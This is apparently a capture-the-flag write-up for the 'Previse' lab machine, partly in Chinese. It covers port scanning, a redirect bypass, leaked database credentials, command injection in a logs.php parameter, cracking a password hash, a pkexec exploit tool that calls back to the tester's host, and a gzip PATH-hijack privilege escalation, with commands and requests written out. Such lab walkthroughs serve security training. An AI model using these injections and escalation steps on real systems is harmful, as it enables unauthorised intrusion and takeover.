Information Gathering
IP Address | Opening Ports |
---|---|
10.10.11.104 | TCP:22,80 |
$ ip='10.10.11.104'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53ed4440116e8bda698579c081f23a12 (RSA)
| 256 bc5420ac1723bb5020f4e16e620f01b5 (ECDSA)
|_ 256 33c189ea5973b1788438a421100c91d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-title: Previse Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
EAR && Php files analysis RCE
![](https://i-blog.csdnimg.cn/img_convert/0d740a06cc2690754ea6f28605f25e57.jpeg)
$ feroxbuster -u 'http://10.10.11.104' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
![](https://i-blog.csdnimg.cn/img_convert/17e25a5005d4be73681e88f106685531.jpeg)
![](https://i-blog.csdnimg.cn/img_convert/2432a01371cca68a0b0bfbab773454cd.jpeg)
删除相应包中Location: login.php。
![](https://i-blog.csdnimg.cn/img_convert/3efe8e374c01c918a28b5d1625c47a26.jpeg)
![](https://i-blog.csdnimg.cn/img_convert/5db769da0f48c5b098ef62ca4d8e44fc.jpeg)
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1
username=maptnh&password=maptnh&confirm=maptnh&submit=
![](https://i-blog.csdnimg.cn/img_convert/8b2e62bd664caa75533200eb094aab64.jpeg)
![](https://i-blog.csdnimg.cn/img_convert/22ecf8db98c0ae684b06174af512a550.jpeg)
http://10.10.11.104/download.php?file=32
![](https://i-blog.csdnimg.cn/img_convert/468de104403d9a7efb7c00804790fe66.jpeg)
$ unzip siteBackup.zip
logs.php
![](https://i-blog.csdnimg.cn/img_convert/992c95f3d8536ff6e401e825a96bc9bf.jpeg)
用户名:m4lwhere
![](https://i-blog.csdnimg.cn/img_convert/da92d32a23fd838bd9d26546d0a88769.jpeg)
$ cat config.php
![](https://i-blog.csdnimg.cn/img_convert/f4b59bfe45001401294eb618c712507a.jpeg)
username:root
password:mySQL_p@ssw0rd!:)
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.11.104/nav.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1
Content-Length: 30
delim=;ping -c 1 10.10.16.28
![](https://i-blog.csdnimg.cn/img_convert/14bd32fa12debcb97f3659616bfa663a.jpeg)
![](https://i-blog.csdnimg.cn/img_convert/6c18b54fd9d033340d40880e987f3661.jpeg)
User.txt
62f7407560ca5d003a6fd3a917ec8bdf
Lateral Movement
$ mysql -u root -p'mySQL_p@ssw0rd!:)'
![](https://i-blog.csdnimg.cn/img_convert/4bfc09ef1ee6886297ecbfc44df69441.jpeg)
mysql> select * from accounts;
![](https://i-blog.csdnimg.cn/img_convert/19d4b55f52bcc6fa9d8bf2c2e3479017.jpeg)
不能在这里直接复制...需要在accounts.php寻找可复制的盐
![](https://i-blog.csdnimg.cn/img_convert/e882719fca365df3865432c903f3ef47.jpeg)
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
$ john hash --wordlist=/home/maptnh/Desktop/rockyou.txt --format=md5crypt-long
password:ilovecody112235!
![](https://i-blog.csdnimg.cn/img_convert/1888f3611aa5a5dff31d966354b36d61.jpeg)
Privilege Escalation:TRP00F && Gzip Path Hijack
TRP00F
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y
![](https://i-blog.csdnimg.cn/img_convert/ac9ec1be6bbf613121dd664fe886a978.jpeg)
Gzip Path Hijack
![](https://i-blog.csdnimg.cn/img_convert/d3bbf077b25e8ec43e3b3d7737cb492e.jpeg)
$ export PATH=/tmp:$PATH
$ echo -e '#!/bin/bash\n/bin/bash'>/tmp/gzip
$ chmod +x /tmp/gzip
$ sudo /opt/scripts/access_backup.sh
![](https://i-blog.csdnimg.cn/img_convert/f9a272151f0b83b87a56eb89fd52abfa.jpeg)
Root.txt
440aff1f3d4da77970e98a9dc5257cfd